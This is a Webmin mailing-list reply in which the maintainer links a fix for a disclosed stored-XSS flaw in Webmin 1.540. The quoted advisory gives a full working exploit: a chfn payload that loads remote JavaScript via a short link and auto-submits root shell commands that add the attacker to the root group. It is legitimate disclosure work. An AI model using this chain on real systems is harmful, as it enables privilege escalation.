Menu
▾
▴
Re: [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation
|
From: Jamie C. <jca...@we...> - 2011-04-24 01:11:25
|
Hi Javier, Thanks for reporting this - I hadn't considered this attack vector, as I didn't realize that chfn could be used to modify a user's real name. I have created a fix which you can see at : https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881 Also an update for the Users and Groups module can be found at http://www.webmin.com/updates.html , and will be available from within the Webmin UI. - Jamie On 23/Apr/2011 17:46 Javier Bassi <jav...@gm...> wrote .. > Information > -------------------- > Name : XSS vulnerability in Webmin > Software : All versions prior to and including 1.540 are affected. > Vendor Hompeage : http://www.webmin.com > Vulnerability Type : Cross-Site Scripting > Severity : Medium > Researcher : Javier Bassi <javierbassi [at] gmail [dot] com> > > > Description > ------------------ > Webmin is a web-based interface for system administration for Unix. > Using any modern web browser, you can setup user accounts, Apache, > DNS, file sharing and much more. > https://secure.wikimedia.org/wikipedia/en/wiki/Webmin > > > Details > ------------------- > Webmin is affected by a XSS vulnerability in all versions prior to and > including 1.540. > Webmin fails to sanitize $real in useradmin/index.cgi. $real is the > "Full Name" in the finger information of the user. useradmin/index.cgi > is the control panel of the "Users & Groups" section in webmin. > An attacker that has a normal user on the victim's machine could be > able to change his Full Name with chfn command, inject XSS and execute > commands as root. > > > Timeline: > ------------------- > 2011.04.24 - announced at my site/informed developers/disclosed at my site. > > > Solution: > ------------------- > wait for updates. > > > Developing a exploit: > ------------------- > With Webmin you can execute shell commands and the only security > measure Webmin has is checking the Referer in the HTTP headers. So we > can't use <iframe>, but we can bypass this protection by injecting a > code that execute a Javascript file that prints a form that > autosubmits itself to the Webmin's shell.cgi and execute mutiple > commands in the format command1;command2;...;commandn > So XSS-->.js-->form-->autosubmit-->shell.cgi > > The injected code will be displayed inside a form, so we need to close > the original form first with </form>. > The shell/index.cgi form is the next one: > > </form><form class='ui_form' style="visibility:hidden" > action='https://zion:10000/shell/index.cgi' method=post > enctype=multipart/form-data > > <input class='ui_submit' type=submit value="Execute command:"> > <input class='ui_textbox'type=hidden name="cmd" value="" size=50 > style='width:100%'></td> > <input class='ui_submit' type=submit name="clear" value="Clear history"> > <input class='ui_hidden' type=hidden name="pwd" value="/root"> > <input class='ui_hidden' type=hidden name="history" value=""> > <input class='ui_hidden' type=hidden name="previous" value="find /usr > -name sftp-server"> > <input class='ui_hidden' type=hidden name="previous" value="echo > /usr/lib/sftp-server >> /etc/shells"> > <input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells"> > <input class='ui_hidden' type=hidden name="previous" value="find > /usr/lib -name sftp-server"> > <input class='ui_hidden' type=hidden name="previous" value="echo > /usr/lib/openssh/sftp-server >> /etc/shells"> > <input class='ui_submit' type=submit name="doprev" value="Execute > previous command"> > <select class='ui_select' name="pcmd" ><option value="echo > /usr/lib/openssh/sftp-server >> /etc/shells" >echo > /usr/lib/openssh/sftp-server >> /etc/shells > <option value="find /usr/lib -name sftp-server" >find /usr/lib -name sftp-server > <option value="cat /etc/shells" >cat /etc/shells > <option value="echo /usr/lib/sftp-server >> /etc/shells" >echo > /usr/lib/sftp-server >> /etc/shells > <option value="find /usr -name sftp-server" >find /usr -name sftp-server > </select><input type=button name=movecmd value='Edit previous' > onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'> > <input class='ui_submit' type=submit name="clearcmds" value="Clear commands"> > </form> > > We use Javascript to autosubmit it. We add id="lala" in form tag and > also we add the next script at the end of the code: > <script>document.getElementById('lala').submit();</script> > > Commands go in 'cmd' input. A nice combination of commands could be: > chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall > -9 firefox-bin > So when the admim browse "Users & Groups" this will change the Full > name of our user 'neo' back to a safe one, makes us root and kill > firefox. The admin will think firefox crashed and when he goes back to > "Users and Groups" in Webmin it will not crash again beause we already > changed our full name. > To include commands in value="" they must be html escaped: ( > http://www.htmlescape.net/htmlescape_tool.html ) > chfn -f "safename" neo;usermod -G root neo;usermod -g root > neo;killall -9 firefox-bin > > Now we need a .js file that prints the form + the autosubmit code. > (thx to http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/ > ) > It will look like this > > document.write("<\/form><form class='ui_form' > style=\"visibility:hidden\" id=\"lala\" > action='https:\/\/zion:10000\/shell\/index.cgi' method=post > enctype=multipart\/form-data >"); > document.write("<input class='ui_submit' type=submit value=\"Execute > command:\">"); > document.write("<input class='ui_textbox'type=hidden name=\"cmd\" > value=\"chfn -f "safename" neo;usermod -G root neo;usermod > -g root neo;killall -9 firefox-bin\" size=50 > style='width:100%'><\/td>"); > document.write("<input class='ui_submit' type=submit name=\"clear\" > value=\"Clear history\">"); > document.write("<input class='ui_hidden' type=hidden name=\"pwd\" > value=\"\/root\">"); > document.write("<input class='ui_hidden' type=hidden name=\"history\" > value=\"\">"); > document.write("<input class='ui_hidden' type=hidden name=\"previous\" > value=\"find \/usr -name sftp-server\">"); > document.write("<input class='ui_hidden' type=hidden name=\"previous\" > value=\"echo \/usr\/lib\/sftp-server >> \/etc\/shells\">"); > document.write("<input class='ui_hidden' type=hidden name=\"previous\" > value=\"cat \/etc\/shells\">"); > document.write("<input class='ui_hidden' type=hidden name=\"previous\" > value=\"find \/usr\/lib -name sftp-server\">"); > document.write("<input class='ui_hidden' type=hidden name=\"previous\" > value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\">"); > document.write("<input class='ui_submit' type=submit name=\"doprev\" > value=\"Execute previous command\">"); > document.write("<select class='ui_select' name=\"pcmd\" ><option > value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\" >echo > \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells"); > document.write("<option value=\"find \/usr\/lib -name sftp-server\" > >find \/usr\/lib -name sftp-server"); > document.write("<option value=\"cat \/etc\/shells\" >cat \/etc\/shells"); > document.write("<option value=\"echo \/usr\/lib\/sftp-server >> > \/etc\/shells\" >echo \/usr\/lib\/sftp-server >> \/etc\/shells"); > document.write("<option value=\"find \/usr -name sftp-server\" >find > \/usr -name sftp-server"); > document.write("<\/select><input type=button name=movecmd value='Edit > previous' onClick='cmd.value = > pcmd.options[pcmd.selectedIndex].value'>"); > document.write("<input class='ui_submit' type=submit > name=\"clearcmds\" value=\"Clear commands\">"); > document.write("<\/form><script>document.getElementById('lala').submit();<\/script>"); > > We have to upload the file somewhere and use a url shotener. > > Now we need the script code that loads the .js file. Linux program > chfn limits the Full name field to 80 chars and restrict the next > three chars: > = (equal) , (comma) or : (colon) > The XSS code we can use is the next one (tested in FF4.0): > <script>document.write("<script src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script> > (this code bypass NoScript anti-XSS protection) > > To perform the exploit we have login and change our finger information > > neo@Zion ~ $ chfn > Password: > Changing the user information for neo > Enter the new value, or press ENTER for the default > Full Name [safename]: <script>document.write("<script > src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script> > Room Number []: > Work Phone []: > Home Phone []: > neo@Zion ~ $ > > Finally we wait for the admin to invite us to join the root group ;) > > > Other considerations > ------------------- > * The "//" in the XSS code is equal to "http://" only in the cases in > which the code is placed in an http:// website. Because Webmin panel > is https:// we need a URL shortener service with SSL and a valid > certificate. That's why I used bit.ly. The shortest ones like goo.gl > and sr.pr don't have valid SSL ceterfiticate so a warning will appear > in most browsers when trying to access them via https asking us if we > want to continue. In an exploit scenario we can't use them. > * We will be able to modify our Full Name with chfn only if constant > CHFN_RESTRICT is set to "frwh" in /etc/login.defs. This is the default > config in Mandriva and Slackware but not in Debian which is set to > "rwh". I don't know about other distros. > * With XSS we could have also steal admin's cookie but it's most > likely that NoScript will block that attack. The reason why NS can't > block this one is because is not exactly a typical cross-domain XSS. > This is HTML injection or permanent XSS. > > > Credits > ------------------- > Javier Bassi- http://javierb.com.ar > Special thanks to barbarianbob from sla.ckers.org for compressing the > XSS from 92 chars to 80. > > > References > ------------------- > 1. Advisory URL: http://javierb.com.ar/2011/04/24/xss-webmin-1-540/ > 2. Exploit in action: http://www.youtube.com/watch?v=CUO7JLIGUf0 > > ------------------------------------------------------------------------------ > Fulfilling the Lean Software Promise > Lean software platforms are now widely adopted and the benefits have been > demonstrated beyond question. Learn why your peers are replacing JEE > containers with lightweight application servers - and what you can gain > from the move. http://p.sf.net/sfu/vmware-sfemails > - > Forwarded by the Webmin development list at web...@we... > To remove yourself from this list, go to > http://lists.sourceforge.net/lists/listinfo/webadmin-devel |
